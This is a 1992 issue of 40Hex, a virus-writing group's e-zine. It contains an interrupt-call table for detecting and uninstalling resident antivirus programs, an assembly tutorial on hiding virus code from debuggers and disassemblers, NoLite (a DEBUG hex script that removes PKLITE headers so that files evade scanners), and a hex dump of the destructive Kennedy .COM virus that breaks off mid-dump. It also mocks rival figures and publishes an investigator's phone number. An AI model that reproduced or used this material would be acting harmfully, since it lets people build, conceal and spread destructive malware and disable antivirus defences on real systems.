40Hex Number 6 Volume 2 Issue 2 File 000 Welcome to 40Hex issue 6. If this is your first time reading an issue of 40 Hex, I welcome you, but recommend that you start with an earlier issue. This issue will have a Virus Spotlite on Creeping Death(Dir-2). It isn't in the normal Hex Dump format, and it is fully commented. - Landfill is temporarily down(again!). This is due to several [NuKEd] hard drive controllers... we are down but NOT out. Hopefully we should be up within several weeks of the release of this issue. Hellraiser is still unable to edit the magazine, hopefully next issue he will be back in charge. - I think we must discuss one problem. Recently, we have been verbally "attacked" by some lamers in the virus scene who like to jerk off on Fidonet. To clear up the issue at hand, we personally don't use all of the methods found in the articles. For example, we don't sit around all day and PKLite infected files and then remove the PKLite header. We let you people do it. As a matter of fact, we made it a hell of a lot easier due to this month's article called NoLite. No self-respecting virus group would do it. Not everyone that reads this magazine is a virus programmer, but wants to learn. Ya gotta start somewhere. Another person who has been insulting us on FidoNet is Sara Gordon. I do not know the whole story behind her hatred, but I know it stems from a phone conversation between her and Hellraiser. From what I understand, they disagreed on many topics, and HR may have gotten insulting (I don't know the whole story) - Anyone that would like to submit articles feel free to do so, as long as what you write is not stolen from another source and is of good quality. If you would like to write articles contact any PHALCON/SKISM member or upload them to either Digital Warfare or PHUN LINE. 40 Hex Mag Issue 6 April 1992 The Contents File 000.............................You Are Here File 001.............................Finding anti-viral programs in memory File 002.............................Code Concealing: Part I File 003.............................More Busts and Updates File 004.............................The NoLite Utility File 005.............................PHALCON/SKISM Update File 006.............................Some Dick who wants to bust virus authors File 007.............................The Kennedy Virus File 008.............................Cornell students nailed for viruses File 009.............................The Truth Behind Virus Scanners File 00A.............................Virus Spotlite-Dir2 Full commented source File 00B.............................Scan strings, and how to avoid them File 00C.............................!Virus Contest! Our Members: Axiom Codex(*)-(Sysop of PHUNLINE) Count Zero(*)-(Hacker, Amiga Programmer, Master of 150#) CRoW MeiSTeR(K)-(Sysop of Crow Tech., Goob) Dark Angel-(Programmer, Master Chef) DecimatoR(*)-(Sysop of Digital Warfare, Programmer) Demogorgon-(Hacker, Programmer) Garbageheap-(Fearless Leader, Sysop of LandFill, Programmer) Hellraiser-(Fearless Leader, Programmer) Instigator(*)-(Terry Oakes' butt-buddy, 40 Hex writer) Joshua Tower-(Electronics, MonkeyWrenching) Lazarus Long-(Programmer) Night Crawler-(Courier, Keeper of All Virii) Orion Rogue-(Rouge?, named us, then laid back, and relied on name) Paragon Dude-(Macintosh Progammer(lonely)) Renegade(*?)-(Hacker, Macintosh Programmer) Time Lord(*)-(Sysop of USSR Systems) (*)-Denotes persons who should avoid bending over for the soap, and invest in large quantities of KY Jelly. (K)-Denotes persons who should get KY Jelly anyway. (*?)-Denotes persons who came too close, and wisely backed off and also saved a fortune on KY Jelly. Special Goodbye's to:Piff'(Sorry ya had to quit) Greets to: Attitude Adjuster, Dekion, Loki, [NuKE], Suicidal Maniac, and our readers (do we have any?!?!?) P.S. The transcript of the Alliance mentioned in last issue will NOT be released in this issue. This issue is just too damned packed to add another large file. It will be put into 40Hex-7, if we aren't in jail. -)GHeap 40Hex Number 6 Volume 2 Issue 2 File 001 ------------------------------------------------------------------------------- Memory Resident Anti-Virus Detection and Removal ------------------------------------------------------------------------------- Here is a list of ways to see if anti-viral utils are present in memory. I got the list out of PC interupts, a book by Ralph Brown. Here they are: F.-DRIVER.SYS (Part of the F-Protect virus package by Fridrik Skulason.) This program "grabs" the INT 21 monitoring code, if it was not already taken by another program. INT 21h, Function 4Bh, Sub Function EEh AX must = 4BEEh at call, and call returns AX=1234h if F-Prot sucessfully grabbed INT 21, and AX=2345h if the grab failed. F-DLOCK.SYS (A HD access restrictor, part of F-Protect Package) Call INT 2Fh, Funct. 46h, SubFunct 53h At call, AX must = 4653h, CX=0005h, BX= 0000h If present in ram, AX will return FFFFh. To uninstall, call with AX & CX the same as above, but BX= 0001h. AX, ES, & BX will be destroyed. F-LOCK.EXE (Part of F-Protect package, looks for "suspicious" activity) INT 2Fh, Funct 46h, SubFunct. 53h To call: AX = 4653h, CX=0002h, BX=0000h (installation check) BX=0001h (uninstall) BX=0002h (disable v1.08 & below) BX=0003h (enable v1.08 & below) Call returns AX=FFFFh if installed ( BX=0000h at call) AX, BX, and ES destroyed, if uninstalled (BX=0001 at call) F-POPUP.EXE (Pop up menu for F-Protect) INT 2Fh, Funct. 46h, SubFunct. 53h To call: AX=4653h, CX=0004h, BX= 0000h, 0001h or 0002h (See above - BX same as F-Lock) Returns: Same as F-LOCK.EXE F-XCHK.EXE (Prevents execution of any progs which don't have self-checking code added by F-XLOCK) INT 2Fh, Funct. 46h, SubFunct 53h To Call: Registers = same as F-Popup, except CX=0003h, and BX = 0000h (installation check) or 0001h (uninstall) Returns: same as F-LOCK, above. TBSCANX (Resident Virus scanning Util by Frans Veldman) INT 2Fh, Function CAh, SubFunct 00h Call: AX=CA01, BX=5442h ("TB") Returns: AL=00h if not installed, AL=FFh if installed BX=7462h ("tb") if BX was 5442h during call INT 2Fh, Function CAh, Subfunction 02h (Set state of TBSCANX) Call: AX=CA02h, BL = new state (00h=disabled, 01h=enabled) VDEFEND (Part of PC-tools. Works on v7.0) INT 21h, Function FAh To call: AH=FAh, DX=5945h, AL=subfunction (01h to uninstall) returns: CF set on error, DI = 4559h (?) DATAMON (PC Tools 7.0 file protection) INT 2Fh, Funct 62h, Sub Funct 84h Call: AX=6284h, BX=0000h (for installation check), CX=0000h Returns: AX=resident code segment, BX & CX = 5555h Flu Shot, or Virex PC INT 21h Call: AX=0ff0fh Returns if either is installed: AX=101h If anyone has any more Anti-Viral IDs, post 'em on Digital Warfare and I'll update this list. ---DecimatoR PHALCON/SKISM 40HEX_6_002 SEGMENT PUBLIC 'code' ORG 100H ASSUME CS:CODE,DS:CODE,SS:CODE,ES:CODE ;****************************************************************************** Concealment: Keep Your Code Hidden From Prying Eyes by Demogorgon/PHALCON/SKISM Recently, I have been experimenting with a few new programming techniques that should be of great interest to the virus writing community. It is always our top priority to keep our code out of the hands of lamers in order to prevent the dreaded 'text change' and above all, to cause the anti-virus community as much grief as possible. In order to do this, we must put a great deal of effort into concealing our code. That is the focus of this article. This file is divided into two parts. The first part is devoted to developing 'debug resistant' code, and the second part deals with defeating disassemblers. I will not cover encryption, because methods of encryption are commonly known and there is really not much further I can go with that. For a complete review of self encryption methods, take a look at Dark Angel's Funky Virus Writing Guide (number three, the one that hasn't been released yet.) Part_I: The debugger is NOT your friend The basic idea behind writing debug ressistant code is finding a way to make your code behave differently when it runs under a debugger. With a real mode debugger, this is simplicity itself. All that is necessary is a little knowledge of how a debugger works. A debugger, such as debug or TD traces through a program by setting handlers to int 1 and int 3. These are called after every instruction is executed. A virus that wishes to avoid being debugged can simply replace the handlers for these interrupts, and the results will be just about whatever you want. Here is some code to do this: eat_debug: push cs pop ds mov dx, offset eat_int mov ax,2501h int 21h mov al,03h int 21h ... ; rest of code eat_int: iret As you can see, this requires minimal space in your code, and is certainly worth the effort. You can experiment by placing something else at 'eat_int'. Another commonly used tactic is to disable the keyboard interrupt while certain parts of the code are being executed. This will surely keep lamers baffled, though a pro would recognize what was going on immediately. I am sure McAfee's programmer's scoff at code such as this. Also note that while this will defeat the average real mode debugger, any protected mode debugger will step through this as if it weren't there. Playing with interrupts will not help you when your program will be running in a virtual cpu anyway. One method I found which will work nicely against td386 is to throw in a hlt instruction. This will give TD an exception 13 error, and terminate the program. Anyone who is aware of this will just step over a hlt instruction, so therefore methods must be used to conceal its presence, or to make it a necessary part of the code. This will be covered in part II. Another trick you can play is to call int3 within your program. If someone tries to run your program under a debugger, it will stop each time int3 is called. It is possible to trace through it, but it will be annoying if there are many int3's thrown in. Part_2: Kill your disassembler No matter how well you mess up debuggers, your program is entirely at the mercy of a programmer armed with a good disassembler. Unless, of course, you use techniques that will confuse disassemblers. My favorite method for baffling them is to create code that overlaps. Overlapping code may seem a little bit too complicated for most of us at first, but with the knowledge of a few instruction hex translations, you too can make effective overlapping code without sacrificing too much code size. Overlapping code can get as complex as you would like, but this file will only deal with the simplest examples. eat_sr: mov ax,02EBh jmp $-2 ; huh? ... ; rest of code This may confuse you at first, but it is fairly simple. The first instruction moves a dummy value into ax. The second instruction jmps into the value that was just moved into ax. '02EB' translates into 'jmp $+2' (remember that words are stored in reverse). This jump goes past the first jmp, and continues on with the code. This will probably not be sufficient to defeat a good disassembler like Sourcer, but it does demonstrate the technique. The problem with this is that Sourcer may or may not just pick up the code after commenting out the 'jmp $-2'. It is difficult to predict how Sourcer will respond, and it usually depends on the bytes that appear directly after the jmp. To severely baffle Sourcer, it is necessary to do some stranger things. Take a look at this example. erp: mov ax,0FE05h jmp $-2h add ah,03Bh ... ; rest of code This code is quite a bit more useful than the previous listing. Let us simulate what would happen if we were to trace through this code, showing a hex dump at each step to clarify things. B8 05 FE EB FC 80 C4 3B mov ax,0FE05h ; ax=FE05h ^^ ^^ ^^ B8 05 FE EB FC 80 C4 3B jmp $-2 ; jmp into '05 FE' ^^ ^^ B8 05 FE EB FC 80 C4 3B add ax,0EBFEh ; 05 is 'add ax' ^^ ^^ ^^ B8 05 FE EB FC 80 C4 3B cld ; a dummy instruction ^^ B8 05 FE EB FC 80 C4 3B add ah,3Bh ; ax=2503h ^^ ^^ ^^ The add ah,03Bh is there simply to put the value 2503h into ax. By adding five bytes (as opposed to simply using 'mov ax,2503h') this code will confuse disassemblers pretty well. Even if the instructions are disassembled properly, the value of ax will not be known, so every int call after this point will not be commented properly, as long as you never move a value into ax. You can conceal the value from the disassembler by using 'add ax' or 'sub ax' whenever possible. If you examine this closely, you can see that any value can be put into ax. Two of the values can be changed to whatever you want, namely the FE in the first line, and the 3B in the last line. It is helpful to debug through this chunk of code to determine what values should be placed here in order to make ax what you would like it to be. Back to the subject of killing debuggers, it is very sneaky to hide something like a hlt instruction inside another instruction, such as a jmp. For example, take a look at this: glurb: mov cx,09EBh mov ax,0FE05h ;-\ jmp $-2 ; >--this should look familiar to you add ah,03Bh ;-/ jmp $-10 ... ; rest of code The three lines in the middle are a repeat of the previous example. The important part of this code is the first line and the 'jmp $-10'. What happens is, the jmp goes back into the 'mov cx' instruction. The '09EB' translates into 'jmp $+9'. This lands in the '$-10' part of the first jmp. The $-10 just happens to be stored as 0F4h, the hlt instruction. By making the hlt part of another instruction, it is not visible when it is being traced through by td386. It is also not possible to remove it without altering the code. The purpose of this article is not to supply code to be thrown into your own programs. The purpose is to get you to think about new ways to avoid having your code looked at and modified by others. The most important thing is to be original. It is pointless for you to simply duplicate this code, because anyone else who has read this file will already know what you are trying to do. code ENDS END concealment 40Hex Number 6 Volume 2 Issue 2 File 003 Well, there have been plenty of busts in 1992 so here is the run down to the best of my knowledge for anyone who is interested: Asphi: Busted by MCI on January 20 for hacking on 476's. Had to pay $2700 for the phone calls he made. From what I found out MCI Wants to nail him to the wall. Charges include: Unlawful use of a computer, Credit Card Fraud, Theft of Services, Criminal Conspiracy and some more I can't think of, 10 or so total. And of course they took his system. He is going to have a trial, but a date has not yet been set. Axiom Codex: Billed $2000 for equal access codes. Cold Steel: Billed $40.00 for 476's Count Zero: Yet another that got nailed for 476's. Billed $86.63 and had to tell his parents. Deathblade: Billed $100 for 476's. Dekion: Also nailed for 476's. Not sure if he will be charged. Billed somewhere between $100 - $1000. Genghas Khan: Nailed for CBI and for 733's. Not sure about what will happen to him, but I heared from his friend that he is really screwed. Instigator: I got nailed in the 476 ring too. They took my system but gave it back. I got billed for $1970.17. I got charged with 1 count of Theft of services. They dropped the other 8 charges. I am going to be on informal probation for a short period. Marauder: Raided last year by GBI, they took his computer equipment and never gave it back. They finally decided to charge him with some misdemeanors. Netrunner: Billed $100 for 476's. Terminal: Arrested same time as Genghas Kahnvict. He is NOT a minor... VenoM: 476's again. Billed $75.00 and had to tell his parents. *** AND the LAMEST bust of the month award goes to: DecimatoR - for sitting in his car along a main road while using the beige box! He ran up a wopping $0.81 phone bill before the cop came by and asked him if he was having car trouble and saw the wires running from the car into the telephone pole. He was arrested, then released. No charges have been filed.... yet! *** AND the second LAMEST bust of the month award goes to: Hot Rize - for wizely running his neighbors phone line into his own house. No one would notice that one, eh? We also recieved confirmed reports that he is a dweeb. ------------------------------------------------------------------------------- All 4 PHALCON/SKISM joints went down between January and March. The Landfill for security reasons, Digital Warfare because of me getting busted, PHUN LINE for security reasons, and USSR because Time Lord may be getting busted. Digital Warfare went back up though, with DecimatoR as sysop. ** Apparently the head of the 476 operations is Terry Oakes. He is the phone Fraud investigator in charge of the TeleConnect Investigations. Give him a ring at 800-476-1234 Ext. 3045. Thank you. ** References to 476's are refering to 800-476-9696 owned by Teleconnect, a subsidary of MCI. (6 Digit Calling Cards - Get a LAMER to hack 'em) ** Make sure you change your passwords if you use the same one on Digital Warfare as you do on other boards. They have the OLD user list. ** Additions to the list will be on a first busted first added basis. -Instigator 40Hex Number 6 Volume 2 Issue 2 File 004 NOLITE v1.0 By DecimatoR of PHALCON/SKISM PD War Collection Program 1 This program will remove the PKLITE header from .EXE and .COM for two reasons. A) To make the file un-decompressable, which dosen't mean much if you have the registered version of PKLITE. B) More importantly, makes the PKLITEd file unscannable to virus scanners, such as McAfees' Virus Scan etc... Does this by overwriting the header with random text from memory. Parameters are simple: NOLITE filename.ext (Extension MUST be included!) Will remove the header from PKLITEd files. It will not remove the header if it is not a genuine PKLITE file. Note: This program is based on PKSMASH, which was written by Hellraiser. Unfortunately, a bug surfaced in that program, which caused it to lock up sometimes. So I wrote this to replace PKSMASH, and stole HR's dox. ---DecimatoR Cut out the following code, call it NOLITE.HEX, then DEBUG < NOLITE.HEX ------------- Rip here ---------- Slice here ---------- Mince Here ---------- n nolite.com e 0100 4D 5A 53 00 03 00 00 00 09 00 FB 00 FF FF 46 00 e 0110 00 04 00 00 00 01 F0 FF 50 00 00 00 03 01 9A 07 e 0120 8A 15 20 83 C4 06 B8 0D 00 50 B8 01 00 50 9A 2F e 0130 89 15 20 83 C4 04 C7 06 38 6B 00 00 8B E5 5D C3 e 0140 55 8B EC 83 EC 02 FF 36 16 35 E8 C4 19 83 C4 00 e 0150 7A 01 03 00 01 00 20 00 09 00 FF FF 00 00 00 00 e 0160 00 00 00 01 00 00 3E 00 00 00 01 00 FB 30 6A 72 e 0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0190 B8 38 01 BA 3D 00 8C DB 03 D8 3B 1E 02 00 73 1D e 01A0 83 EB 20 FA 8E D3 BC 00 02 FB 83 EB 19 8E C3 53 e 01B0 B9 C3 00 33 FF 57 BE 48 01 FC F3 A5 CB B4 09 BA e 01C0 36 01 CD 21 CD 20 4E 6F 74 20 65 6E 6F 75 67 68 e 01D0 20 6D 65 6D 6F 72 79 24 FD 8C DB 53 83 C3 2D 03 e 01E0 DA BE FE FF 8B FE 8C CD 8B C5 2B EA 8B CA D1 E1 e 01F0 D1 E1 D1 E1 80 EC 10 80 EF 10 8E C0 8E DB F3 A5 e 0200 FC 8E DD 07 06 BF 00 01 33 F6 AD 95 BA 10 00 EB e 0210 2C 90 AD 95 B2 10 EB 35 AD 95 B2 10 EB 36 AD 95 e 0220 B2 10 EB 3B AD 95 B2 10 EB 5D AD 95 B2 10 EB 5E e 0230 AD 95 B2 10 EB 5F AD 95 B2 10 72 08 A4 D1 ED 4A e 0240 74 F4 73 F8 33 C9 33 DB D1 ED 4A 74 C5 D1 D3 D1 e 0250 ED 4A 74 C4 D1 D3 85 DB 74 17 D1 ED 4A 74 BF D1 e 0260 D3 80 FB 06 72 0B D1 ED 4A 75 04 AD 95 B2 10 D1 e 0270 D3 2E 8A 8F 5E 01 80 F9 0A 74 74 33 DB 83 F9 02 e 0280 74 2A D1 ED 4A 74 9D 72 23 D1 ED 4A 74 9C D1 D3 e 0290 D1 ED 4A 74 9B D1 D3 D1 ED 4A 75 04 AD 95 B2 10 e 02A0 D1 D3 80 FB 02 73 15 2E 8A BF 6E 01 AC 8A D8 56 e 02B0 8B F7 2B F3 FA F3 26 A4 FB 5E EB 81 D1 ED 4A 75 e 02C0 04 AD 95 B2 10 D1 D3 80 FB 08 72 DB D1 ED 4A 75 e 02D0 04 AD 95 B2 10 D1 D3 80 FB 17 72 CB D1 ED 4A 75 e 02E0 04 AD 95 B2 10 D1 D3 81 E3 DF 00 86 DF EB BD AC e 02F0 02 C8 80 D5 00 3C FF 75 82 5B 8B EB 83 C3 10 33 e 0300 C0 AC 91 E3 0E AD 03 C3 8E C0 AD 97 26 01 1D E2 e 0310 F9 EB EC AD 03 C3 FA 8E D0 AD 8B E0 FB AD 03 D8 e 0320 53 AD 50 8E C5 8E DD 33 C0 8B D8 8B C8 8B D0 8B e 0330 E8 8B F0 8B F8 CB 03 00 02 0A 04 05 00 00 00 00 e 0340 00 00 06 07 08 09 01 02 00 00 03 04 05 06 00 00 e 0350 00 00 00 00 00 00 07 08 09 0A 0B 0C 0D 00 00 00 e 0360 3A 00 00 F5 01 B8 23 00 8E C0 E8 CF 00 E8 00 00 e 0370 C7 00 83 FA 01 B4 09 BA 5C 00 CD 21 74 0A BA 87 e 0380 55 00 00 0C 09 E9 07 01 33 C9 E8 E7 40 01 00 8B e 0390 D7 B0 02 B4 3D 10 73 03 E9 EE 00 28 40 A3 0C 00 e 03A0 B9 39 51 59 41 83 F9 64 75 39 15 2A CB 2A DD 12 e 03B0 8B 09 A5 1E 1A 01 00 BA 0E 12 3F 28 50 12 80 3E e 03C0 08 50 75 D9 B9 0B B6 52 11 0F 11 BE 07 BF 49 81 e 03D0 38 10 F3 A6 3A 00 74 0C 5A 52 52 8A 5C B0 1A 42 e 03E0 1A EB B3 A2 6A 0A 33 D2 0A 0E 16 95 43 10 59 49 e 03F0 30 27 5B 35 0D B4 40 58 31 91 24 0F 16 5A 0F 72 e 0400 6E A5 1F 35 49 01 09 16 B4 3E 3D 00 40 64 90 8A e 0410 04 3C 20 74 06 3C 09 74 02 3C 0D C3 01 40 27 4A e 0420 01 C3 32 ED 8A 0E 80 00 41 BE 81 01 00 73 4C 01 e 0430 E8 DE FF 75 03 46 E2 F8 51 E3 03 00 A4 FC F3 A4 e 0440 06 1F 59 33 DB E3 0F BE 18 C6 02 85 18 04 C6 04 e 0450 00 43 1C F4 89 1E 29 A1 36 C0 2E E3 0C 3B 0E 00 e 0460 B0 0C 73 06 FC AE 75 FD E2 FB C3 BA FD 21 01 E0 e 0470 B4 4C A0 0B 7E 00 4B 4C 49 54 45 A0 01 20 43 6F e 0480 70 72 2E 47 8B 0D 0A 36 00 4E 4F 5F 28 63 29 20 e 0490 31 39 39 32 20 00 00 44 65 63 69 6D 61 74 6F 52 e 04A0 20 50 48 41 4C 43 4F 00 00 4E 2F 53 4B 49 53 4D e 04B0 0D 24 0A 20 20 52 65 6D 6F 70 42 76 65 73 20 50 e 04C0 93 73 69 67 6E 01 14 2A 75 72 65 20 66 72 6F 6D e 04D0 05 69 A5 0A 6C 1C 2E 52 28 55 73 DC 66 65 3A 20 e 04E0 59 3C 17 A1 4C 27 6D 65 3E 1A 24 1D 3A 05 4E 6F e 04F0 08 40 77 61 55 66 6F 75 00 00 6E 64 20 2D 20 6E e 0500 6F 74 68 69 6E 67 20 64 6F 6E 36 25 65 07 32 45 e 0510 72 5F 72 4B A1 1A 2C 74 81 70 74 20 A0 E0 28 73 e 0520 75 63 63 6C 73 66 75 6C 74 7A 22 53 10 21 AB A4 e 0530 5A 40 4E 72 C6 69 AA 52 44 48 19 74 A0 01 40 79 e 0540 65 64 21 24 FF 01 00 00 01 01 00 00 00 00 00 00 e 0550 00 00 01 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A rcx 055F w q ------------- Rip here ---------- Slice here ---------- Mince Here ---------- 40Hex Number 6 Volume 2 Issue 2 File 005 I'm back, well kind of. Anyways, a lot of people have been asking, "What's going on with the group?" The question should be, "What's going on with any group these days?" It seems to me that 1992 was the death of h/p, or at least the "ice age" of it. Everybody was either getting busted or quitting the scene. Oh well, what can I say about it. Our group has been having bad luck too. Five (now six) busted as well as other assorted bad things happening to members. Anyways, what's going on with us, huh?. Well the reason you haven't heard much from us is because we haven't been releasing our new stuff to BBS systems ( BBS system sounds as redundant as PIN number, I know) because we have a strong feeling that members of such groups as the CVIA are logging on to h/p boards in the hope of snatching the latest viruses. Well not much you can do about it if you run a BBS, unless you personnally know everyone who calls your board. But come to think of it - what good does it prove to release your newest creation to the general public (of the h/p crowd) via BBS system? Isn't that the same principle as the warez puppy scene? I guess you all can do whatever turns you on but we kind of decided that it would be in our best interests to release our stuff to BBS's only after they have been detected by the popular scanners or until they are kind of old. Not to fear, 40-HEX and "Dark Angel Phunky Writing Guide" will still be on boards at the same rate as always. As for all of you people bitching that no longer have sites and that we are dead, well your dead - wrong. The current sites are as follows (in no specific order) - Digital Warfare (yes it's back, at a new number however), Time Lords BBS (The U.S.S.R System), The Phunline (yes it's back), and the newest addition - Crow Technology. And as for us being dead yeah right. ** Note from DecimatoR: The U.S.S.R System recently went down, due to Time Lord getting into a little hot water. It WILL return however... we're just not sure when. ** ** Note from GHeap: I am coming back, gimme mo' time! So now with that out of the way, on the other news. Hmmm..... Michelangelo caused quite a scare there for a while. It was pretty cool to see John, Patti, and the rest of the crew on T.V... John Dvorak has a new half hour computer talk show on syndicated radio. I'm sure he wouldn't mind if we got on the show some time soon. Check your local radio guide for your local station and time... I am offering a standing bounty of $1,500 for the person willing to fly to Ohio and kick Crow Meisters ass for good. A minor would be preferred, being that he is under 18 and if I smashed him I could get sued or something. Just kidding, Crow Meister is cool with me, hihihihi... A new federal law is being considered which if passed will outlaw the authorship of computer viruses totally, research or not. Read more about that later in this issue... Hey, I might have a BBS up soon! I have been saying that for the past 2 years haven't I? Well that's the news as I see it, it's nice to be writing for this rag again. Check ya in 25 to life.... Hellraiser P/S 1992 This article was typed by Time Lord for HR cuz he is WAY too lazy to send me a disk in place of a fuckin print out... 40Hex Number 6 Volume 2 Issue 2 File 006 Well, this little news "tid-bit" came from Attitude Adjuster, one of the few non-PHALCON/SKISM contributers (ok, the ONLY non P/S member), Thanks a lot dude, keep the submissions coming. The article itself is quite sad, and makes me question the intelligence of our opposition. -)GHeap&Demo Thanx to CZ for THE line. ------------------------------------------------------------------------------- - We need Computer Virus Snitches - Written By Mike Royko, Tribune Media Services. Retyped by The Attitude Adjuster ============================================================================ Millions of computer users are wondering how to protect themselves against the wave of viruses that are threatening their machines. I have a suggestion.[So do I, avoid Bnu 1.90Beta] First, they should remember that these viruses don't spring from nature. They are little computer programs that are created and sent on their way by people that are brainy, malicious and arrogant.[I am not brainy] So, the question is, how do you find the creators of computer virus programs? Because they are arrogant, it's likely that they want someone to know what a clever thing they have done. They won't hold a press conference [Actually, we do hold press conferences. See Michael Alexander@Computerworld] but chances are they will brag to a trusted friend or acquaintance or fellow hacker. It is sad, but the world is full of snitches.[Get a thesaurus] Look at John Gotti, the nation's biggest Mafia boss. There was a time when it was unthinkable for even the lowest-level Mafia soldier to blab. But now Gotti has to sit in court while his former right-hand man tells about how they got people whacked. [We whack people too] So if Mafia figures can be persuaded to tattle[Na-na-na-na-na], is there any reason to believe that nerds have a greater sense of honor and loyalty? [Yes, we also have brains] Of course[.] not, but how do you get them to do it? Money. [Now yer talking... my mom is really the Dark Avenger, I want my money now.] These companies [what companies, I only hit hospitals] could use petty cash to place ads in the computer magazines and on the electronic bulletin boards. [Ok, call my BBS and post this tidbit. 40Hex now has ad space available] The ads would say something like: "A $50,000 reward for any information leading to the arrest and conviction of virus authors." [How can you convict a virus author. It isn't illegal. Go play Tank Wars.] The next question would be what to do with the virus makers once they have been caught. And that's the key to putting an end to the problem: something that could be posted on those electronic bulletin boards that might cause an aspiring virus-maker to go take a brisk walk instead. A judge would sit and listen to an attorney who would say some- thing like this: "Your honor, what we have here is an otherwise fine young man from a good family. His father is a brilliant scholar, and the son will someday be the same."[I am going to be a certified scholar when I grow up.] "What he did was no more than an intellectual prank, a cerebral challenge of sorts. Like the man who climbed Mount Everest because it was there, he created the virus and sent it fourth because it was there." Then, we can hope, the judge might say something like this: "Yes, I am impressed by the defendant's brain power. And I expected you to ask me to give him a slap on the wrist." "However, he is not a child. He is an adult. And I would think that so brilliant a grown man would know better than to amuse himself by screwing with the lives of strangers." [I haven't screwed one stranger] "It's as if he hid inside the businesses and institutions until they were closed and everyone had gone home. Then he came out and went through every filing cabinet and drawer and shredded or burned every bit of useful information he could find."[Cool! Lets try it.] "Now, counselor, what would you and your law partners say is some street mope [See Thesaurus] did that to your firm - crept in and destroyed every document in your offices? Including the names of clients that owe you money. Hah, you would be in here asking me to hang him from a tree."[I love hanging from trees] "So don't give me that smart kid from a good family routine. [I ain't smart, and family ain't good] He is a self-centered, insensitive, uncaring, arrogant goofball [And damn proud]. He didn't give a second thought to the chaos or heartbreak he would cause an adoption agency, a hardworking businessman or a medical clinic." [Yes I did. I aim for them.] "Therefore, I sentence him to the maximum sentence the law allows in the local jailhouse [0, NUL, ZIP-o, /dev/null, etc..], which is a really terrible place, filled with all sorts of crude, insensitive hulks." [Jay-walkers] "Bailiff, please get the defendent up off the floor and administer some smelling salts."[More like, why is the defendant laughing?] "And change his trousers, quickly."[Fuck you] []comments added by Demogorgon and GHeap ============================================================================ I hope you enjoyed that one as much as I did! Okay, I see some really neat things with this man's article. First off, I'm sure he's an adept programmer... that is, he can probably figure out how to get his VCR to tape something while he is off writing his brilliant articles. I enjoy his narrow-minded definition of virii (that was mentioned in 40Hex 5), of course, all virii are those evil overwriting, trigger date, resident, boot track infecting swine (yeah, he probably learned what a virus was from watching ABC News covering the Michaelangelo crisis!) I also enjoy his opinion that all virus authors are nerds. First off, what the hell is a nerd? I mean, I have written a virus before (not saying it was any good), but, I don't feel like a nerd! In fact, I feel quite superior to most of the idiots like this guy. And, I like his great statement about my loyalty. Yes, I'm gonna narc on [PHALCON/ [Forget this again, and die]]SKISM for $50,000!!! Yeah, right. There are a lot of narcs on this not-so good earth, so choose your friends wisely. I'm quite sure that ads on BBS's (electronic bulletin boards! No... cork ones!) would just sufficiently pump up user discussion of virii. I'm not scared of fed intervention, and I doubt any authors I know are either. This was touched on in 40Hex 5, virus authors are not responsible for the spread of their virii unless they are actively spreading them! I mean, it's not my fault that K-Rad Man sent my Hard Drive Blender (slices, dices, minces sectors) to 1000 Bible boards in Utah. Apparently it hasn't dawned on this guy that most virii are not written to be destructive. Actually, that's a lie. There are a lot of virii out there that are descructive, but that is changing. People like the PHALCON/SKISM crew realize that not everything must be destructive, opening the doors to much larger virus projects (ie Bobisms) One more thing... QUIT EQUATING THE WORD 'hacker' TO EVERY DAMN TYPE OF ELECTRONIC 'crime!!!' I'm gonna get this dude's phone #, I say we call him sometime... -The Attitude Adjuster- 40Hex Number 6 Volume 2 Issue 2 File 007 Lets see what good ole' Patty has to say about this: Virus Name: Kennedy Aliases: Dead Kennedy, 333, Kennedy-333 Scan ID: [Kennedy] V Status: Endangered Discovered: April, 1990 Symptoms: .COM growth; message on trigger dates (see text); crosslinking of files; lost clusters; FAT corruption Origin: Denmark Eff Length: 333 Bytes Type Code: PNCKF - Parasitic Non-Resident .COM Infector Detection Method: ViruScan, Pro-Scan, VirexPC, F-Prot, VirHunt 2.0+, NAV, IBM Scan 2.00+, AVTK 4.32+, VIRx 1.6+, CPAV 1.0+, Novi 1.0.1+, Sweep 2.3.1+, UTScan Removal Instructions: F-Prot, VirHunt 2.0+, or delete infected files General Comments: The Kennedy virus was isolated in April 1990. It is a generic infector of .COM files, including COMMAND.COM. This virus has three activation dates: June 6 (assassination of Robert Kennedy 1968), November 18 (death of Joseph Kennedy 1969), and November 22 (assassination of John F. Kennedy 1963) of any year. On activation, the virus will display a message the following message: "Kennedy is dead - long live 'The Dead Kennedys'" The following text strings can be found in the viral code: "\command.com" "The Dead Kennedys" Systems infected with the Kennedy virus will experience cross-linking of files, lost clusters, and file allocation table errors (including messages that the file allocation table is bad). --------------------------------Cut Here------------------------------------ n kennedy.com e 0100 E9 0C 00 90 90 90 CD 20 4B 65 6E 6E 65 64 79 E8 e 0110 00 00 5E 81 EE 0F 01 8B AC 0B 02 B4 2A CD 21 81 e 0120 FA 06 06 74 28 81 FA 12 0B 74 22 81 FA 16 0B 74 e 0130 1C 8D 94 0D 02 33 C9 B4 4E CD 21 72 09 E8 17 00 e 0140 72 04 B4 4F EB F3 8B C5 05 03 01 FF E0 8D 94 20 e 0150 02 B4 09 CD 21 EB EF B8 00 43 BA 9E 00 CD 21 89 e 0160 8C 55 02 B8 01 43 33 C9 CD 21 B8 02 3D CD 21 8B e 0170 D8 B4 3F 8D 94 52 02 8B FA B9 03 00 CD 21 80 3D e 0180 E9 74 05 E8 7E 00 F8 C3 8B 55 01 89 94 0B 02 33 e 0190 C9 B8 00 42 CD 21 8B D7 B9 02 00 B4 3F CD 21 81 e 01A0 3D 65 64 74 DE 33 D2 33 C9 B8 02 42 CD 21 83 FA e 01B0 00 75 D0 3D E8 FD 73 CB 05 04 00 89 84 5B 02 B8 e 01C0 00 57 CD 21 89 8C 57 02 89 94 59 02 B4 40 8D 94 e 01D0 05 01 B9 4D 01 CD 21 72 15 B8 00 42 33 C9 BA 01 e 01E0 00 CD 21 B4 40 8D 94 5B 02 B9 02 00 CD 21 8B 8C e 01F0 57 02 8B 94 59 02 B8 01 57 CD 21 B4 3E CD 21 E8 e 0200 02 00 F9 C3 B8 01 43 8B 8C 55 02 CD 21 C3 03 00 e 0210 2A 2E 43 4F 4D 00 5C 43 4F 4D 4D 41 4E 44 2E 43 e 0220 4F 4D 00 4B 65 6E 6E 65 64 79 20 65 72 20 64 9B e 0230 64 20 2D 20 6C 91 6E 67 65 20 6C 65 76 65 20 22 e 0240 54 68 65 20 44 65 